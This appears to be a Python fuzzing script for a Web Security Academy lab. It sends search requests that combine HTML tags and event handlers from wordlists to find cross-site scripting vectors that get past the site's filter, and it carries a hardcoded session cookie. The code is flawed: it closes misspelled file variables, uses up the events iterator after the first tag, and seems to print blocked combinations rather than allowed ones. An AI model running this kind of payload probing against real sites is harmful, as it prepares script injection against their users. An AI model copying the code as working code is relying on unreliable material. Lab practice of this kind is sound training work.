import requests

burp0_url = "https://0a1b00120433eee3a535ebe3005d0096.web-security-academy.net:443/?search=/\\'\"<>="
burp0_cookies = {"session": "mCZMbnZe0UKh2JESzgXjQW1jvTzbOOjF"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Referer": "https://0a1b00120433eee3a535ebe3005d0096.web-security-academy.net/", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers"}

tags=open('/home/kali/Desktop/tags', 'r')
event=open('/home/kali/Desktop/event', 'r')


for ta in tags:
    burp0_url = f"https://0a1b00120433eee3a535ebe3005d0096.web-security-academy.net:443/?search=<{ta}>"
    response = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)

    #if ("Tag is not allowed") in response.text:
    if response.status_code == 200:
       continue
    else:
        print(ta+"this is tag")
        for ev in event:
            burp0_url = f"https://0a1b00120433eee3a535ebe3005d0096.web-security-academy.net:443/?search=<{ta}+{ev}>"
            response = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)

            if response.status_code == 200 :
                continue
            else:
                print(f"{ta}\t{ev}")

enent.close()
tag.close()
